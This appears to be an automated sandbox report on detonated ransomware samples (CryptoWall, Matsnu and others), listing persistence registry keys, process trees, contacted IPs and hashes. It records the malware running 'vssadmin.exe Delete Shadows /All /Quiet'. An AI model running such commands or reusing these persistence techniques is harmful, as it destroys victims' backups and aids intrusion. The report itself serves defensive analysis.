Malware Analysis Report

2025-01-02 14:51

Sample ID 241126-ss613stjek
Target Ransomware-Samples-main.zip
SHA256 5fa4cbe0983a59dddd8a58c33a5cebcc0742c24f59c08f1cf78deebca0672697
Tags
defense_evasion discovery execution impact persistence ransomware upx cerber evasion privilege_escalation jigsaw locky mimikatz bootkit spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5fa4cbe0983a59dddd8a58c33a5cebcc0742c24f59c08f1cf78deebca0672697

Threat Level: Known bad

The file Ransomware-Samples-main.zip was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery execution impact persistence ransomware upx cerber evasion privilege_escalation jigsaw locky mimikatz bootkit spyware stealer

Jigsaw family

Locky family

Jigsaw Ransomware

Locky

Mimikatz

Cerber family

Mimikatz family

Cerber

Deletes shadow copies

Renames multiple (594) files with added filename extension

Renames multiple (3763) files with added filename extension

mimikatz is an open source tool to dump credentials on Windows

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Modifies Windows Firewall

Contacts a large (1098) amount of remote hosts

Contacts a large (1101) amount of remote hosts

Reads user/profile data of web browsers

Drops startup file

Checks computer location settings

Loads dropped DLL

Deletes itself

Executes dropped EXE

Writes to the Master Boot Record (MBR)

Drops desktop.ini file(s)

Looks up external IP address via web service

Adds Run key to start application

UPX packed file

Drops file in System32 directory

Suspicious use of SetThreadContext

Sets desktop wallpaper using registry

Drops file in Program Files directory

Drops file in Windows directory

Program crash

Enumerates physical storage devices

System Network Configuration Discovery: Internet Connection Discovery

System Location Discovery: System Language Discovery

Event Triggered Execution: Netsh Helper DLL

Unsigned PE

Kills process with taskkill

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Suspicious use of WriteProcessMemory

Scheduled Task/Job: Scheduled Task

Opens file in notepad (likely ransom note)

Suspicious use of UnmapMainImage

Interacts with shadow copies

Suspicious use of FindShellTrayWindow

Suspicious behavior: MapViewOfSection

Suspicious use of SetWindowsHookEx

Modifies Internet Explorer settings

Suspicious behavior: EnumeratesProcesses

Runs ping.exe

Uses Volume Shadow Copy service COM API

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2024-11-26 15:24

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-26 15:24

Reported

2024-11-26 15:27

Platform

win7-20240903-en

Max time kernel

132s

Max time network

141s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cryptowall.exe"

Signatures

Deletes shadow copies

ransomware defense_evasion impact execution

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2fddd325.exe C:\Windows\syswow64\explorer.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\*fddd325 = "C:\\Users\\Admin\\AppData\\Roaming\\2fddd325.exe" C:\Windows\syswow64\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\2fddd32 = "C:\\2fddd325\\2fddd325.exe" C:\Windows\syswow64\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\*fddd32 = "C:\\2fddd325\\2fddd325.exe" C:\Windows\syswow64\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\2fddd325 = "C:\\Users\\Admin\\AppData\\Roaming\\2fddd325.exe" C:\Windows\syswow64\explorer.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-addr.es N/A N/A
N/A myexternalip.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2236 set thread context of 2568 N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe C:\Users\Admin\AppData\Local\Temp\cryptowall.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\vssadmin.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\cryptowall.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\cryptowall.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\explorer.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\syswow64\vssadmin.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe N/A
N/A N/A C:\Windows\syswow64\explorer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2236 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe C:\Users\Admin\AppData\Local\Temp\cryptowall.exe
PID 2236 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe C:\Users\Admin\AppData\Local\Temp\cryptowall.exe
PID 2236 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe C:\Users\Admin\AppData\Local\Temp\cryptowall.exe
PID 2236 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe C:\Users\Admin\AppData\Local\Temp\cryptowall.exe
PID 2236 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe C:\Users\Admin\AppData\Local\Temp\cryptowall.exe
PID 2236 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe C:\Users\Admin\AppData\Local\Temp\cryptowall.exe
PID 2236 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe C:\Users\Admin\AppData\Local\Temp\cryptowall.exe
PID 2236 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe C:\Users\Admin\AppData\Local\Temp\cryptowall.exe
PID 2236 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe C:\Users\Admin\AppData\Local\Temp\cryptowall.exe
PID 2236 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe C:\Users\Admin\AppData\Local\Temp\cryptowall.exe
PID 2568 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe C:\Windows\syswow64\explorer.exe
PID 2568 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe C:\Windows\syswow64\explorer.exe
PID 2568 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe C:\Windows\syswow64\explorer.exe
PID 2568 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe C:\Windows\syswow64\explorer.exe
PID 2976 wrote to memory of 2972 N/A C:\Windows\syswow64\explorer.exe C:\Windows\syswow64\svchost.exe
PID 2976 wrote to memory of 2972 N/A C:\Windows\syswow64\explorer.exe C:\Windows\syswow64\svchost.exe
PID 2976 wrote to memory of 2972 N/A C:\Windows\syswow64\explorer.exe C:\Windows\syswow64\svchost.exe
PID 2976 wrote to memory of 2972 N/A C:\Windows\syswow64\explorer.exe C:\Windows\syswow64\svchost.exe
PID 2976 wrote to memory of 2668 N/A C:\Windows\syswow64\explorer.exe C:\Windows\syswow64\vssadmin.exe
PID 2976 wrote to memory of 2668 N/A C:\Windows\syswow64\explorer.exe C:\Windows\syswow64\vssadmin.exe
PID 2976 wrote to memory of 2668 N/A C:\Windows\syswow64\explorer.exe C:\Windows\syswow64\vssadmin.exe
PID 2976 wrote to memory of 2668 N/A C:\Windows\syswow64\explorer.exe C:\Windows\syswow64\vssadmin.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\cryptowall.exe

"C:\Users\Admin\AppData\Local\Temp\cryptowall.exe"

C:\Users\Admin\AppData\Local\Temp\cryptowall.exe

"C:\Users\Admin\AppData\Local\Temp\cryptowall.exe"

C:\Windows\syswow64\explorer.exe

"C:\Windows\syswow64\explorer.exe"

C:\Windows\syswow64\svchost.exe

-k netsvcs

C:\Windows\syswow64\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-addr.es udp
FR 188.165.164.184:80 ip-addr.es tcp
US 8.8.8.8:53 myexternalip.com udp
US 34.160.111.145:80 myexternalip.com tcp
FR 91.121.12.127:4141 tcp
FR 94.247.28.156:8081 tcp
FR 94.247.28.26:2525 tcp
FR 94.247.31.19:8080 tcp
US 209.148.85.151:8080 tcp
FR 188.165.164.184:80 ip-addr.es tcp
US 34.160.111.145:80 myexternalip.com tcp
FR 91.121.12.127:4141 tcp
FR 94.247.28.156:8081 tcp

Files

memory/2568-0-0x0000000000400000-0x0000000000425000-memory.dmp

memory/2568-13-0x0000000000400000-0x0000000000425000-memory.dmp

memory/2568-11-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2568-14-0x0000000000400000-0x0000000000425000-memory.dmp

memory/2236-10-0x00000000003C0000-0x00000000003D6000-memory.dmp

memory/2568-8-0x0000000000400000-0x0000000000425000-memory.dmp

memory/2568-6-0x0000000000400000-0x0000000000425000-memory.dmp

memory/2568-4-0x0000000000400000-0x0000000000425000-memory.dmp

memory/2568-2-0x0000000000400000-0x0000000000425000-memory.dmp

memory/2568-16-0x0000000000400000-0x0000000000425000-memory.dmp

memory/2976-15-0x0000000000080000-0x00000000000A5000-memory.dmp

memory/2972-21-0x0000000000080000-0x00000000000A5000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-26 15:24

Reported

2024-11-26 15:27

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cryptowall.exe"

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\cryptowall.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\cryptowall.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\cryptowall.exe

"C:\Users\Admin\AppData\Local\Temp\cryptowall.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2820 -ip 2820

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 484

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral11

Detonation Overview

Submitted

2024-11-26 15:24

Reported

2024-11-26 15:27

Platform

win7-20240708-en

Max time kernel

120s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe"

Signatures

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\pngcdepqvy.pre N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pngcdepqvy.pre N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pngcdepqvy.pre N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\vnycyvzj = "C:\\Users\\Admin\\AppData\\Roaming\\Nmlpryvbk\\dyuqmpyvzj.exe" C:\Windows\SysWOW64\svchost.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\pngcdepqvy.pre N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\pngcdepqvy.pre N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\svchost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2860 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe
PID 2860 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe
PID 2860 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe
PID 2860 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe
PID 2860 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe
PID 2860 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe
PID 2860 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe
PID 2860 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe
PID 2216 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe C:\Windows\SysWOW64\svchost.exe
PID 2216 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe C:\Windows\SysWOW64\svchost.exe
PID 2216 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe C:\Windows\SysWOW64\svchost.exe
PID 2216 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe C:\Windows\SysWOW64\svchost.exe
PID 2216 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe C:\Windows\SysWOW64\svchost.exe
PID 2772 wrote to memory of 2732 N/A C:\Windows\SysWOW64\svchost.exe C:\Users\Admin\AppData\Local\Temp\pngcdepqvy.pre
PID 2772 wrote to memory of 2732 N/A C:\Windows\SysWOW64\svchost.exe C:\Users\Admin\AppData\Local\Temp\pngcdepqvy.pre
PID 2772 wrote to memory of 2732 N/A C:\Windows\SysWOW64\svchost.exe C:\Users\Admin\AppData\Local\Temp\pngcdepqvy.pre
PID 2772 wrote to memory of 2732 N/A C:\Windows\SysWOW64\svchost.exe C:\Users\Admin\AppData\Local\Temp\pngcdepqvy.pre
PID 2732 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\pngcdepqvy.pre C:\Users\Admin\AppData\Local\Temp\pngcdepqvy.pre
PID 2732 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\pngcdepqvy.pre C:\Users\Admin\AppData\Local\Temp\pngcdepqvy.pre
PID 2732 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\pngcdepqvy.pre C:\Users\Admin\AppData\Local\Temp\pngcdepqvy.pre
PID 2732 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\pngcdepqvy.pre C:\Users\Admin\AppData\Local\Temp\pngcdepqvy.pre
PID 2732 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\pngcdepqvy.pre C:\Users\Admin\AppData\Local\Temp\pngcdepqvy.pre
PID 2732 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\pngcdepqvy.pre C:\Users\Admin\AppData\Local\Temp\pngcdepqvy.pre
PID 2732 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\pngcdepqvy.pre C:\Users\Admin\AppData\Local\Temp\pngcdepqvy.pre
PID 2732 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\pngcdepqvy.pre C:\Users\Admin\AppData\Local\Temp\pngcdepqvy.pre
PID 2832 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\pngcdepqvy.pre C:\Windows\SysWOW64\svchost.exe
PID 2832 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\pngcdepqvy.pre C:\Windows\SysWOW64\svchost.exe
PID 2832 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\pngcdepqvy.pre C:\Windows\SysWOW64\svchost.exe
PID 2832 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\pngcdepqvy.pre C:\Windows\SysWOW64\svchost.exe
PID 2832 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\pngcdepqvy.pre C:\Windows\SysWOW64\svchost.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe

"C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe"

C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe

"C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe"

C:\Windows\SysWOW64\svchost.exe

svchost.exe

C:\Users\Admin\AppData\Local\Temp\pngcdepqvy.pre

C:\Users\Admin\AppData\Local\Temp\pngcdepqvy.pre

C:\Users\Admin\AppData\Local\Temp\pngcdepqvy.pre

C:\Users\Admin\AppData\Local\Temp\pngcdepqvy.pre

C:\Windows\SysWOW64\svchost.exe

svchost.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 nvufvwieg.com udp

Files

memory/2216-0-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2216-8-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2216-12-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2216-11-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2216-10-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2216-4-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2216-2-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2216-13-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2216-6-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2772-15-0x000000007EFA0000-0x000000007EFAE000-memory.dmp

memory/2772-14-0x000000007EFA0000-0x000000007EFAE000-memory.dmp

memory/2772-18-0x000000007EFA0000-0x000000007EFAE000-memory.dmp

\Users\Admin\AppData\Local\Temp\pngcdepqvy.pre

MD5 1b2d2a4b97c7c2727d571bbf9376f54f
SHA1 1fc29938ec5c209ba900247d2919069b320d33b0
SHA256 7634433f8fcf4d13fb46d680802e48eeb160e0f51e228cae058436845976381e
SHA512 506fc96423e5e2e38078806591e09a6eb3cf924eb748af528f7315aa0b929890823798a3ef2a5809c14023c3ff8a3db36277bc90c7b099218422aafa4e0c2ee0

memory/2772-28-0x000000007EFA0000-0x000000007EFAE000-memory.dmp

memory/2832-45-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1196-47-0x000000007EFA0000-0x000000007EFAE000-memory.dmp

memory/1196-50-0x000000007EFA0000-0x000000007EFAE000-memory.dmp

memory/1196-51-0x000000007EFA0000-0x000000007EFAE000-memory.dmp

memory/1196-57-0x000000007EFA0000-0x000000007EFAE000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2024-11-26 15:24

Reported

2024-11-26 15:27

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

Signatures

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Notepad.lnk C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File created C:\Windows\assembly\Desktop.ini C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
File opened for modification C:\Windows\assembly\Desktop.ini C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\assembly\Desktop.ini C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
File opened for modification C:\Windows\assembly\Desktop.ini C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
File opened for modification C:\Windows\assembly C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 dist.torproject.org udp
US 204.8.99.144:443 dist.torproject.org tcp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 144.99.8.204.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 204.8.99.144:443 dist.torproject.org tcp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 134.71.91.104.in-addr.arpa udp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
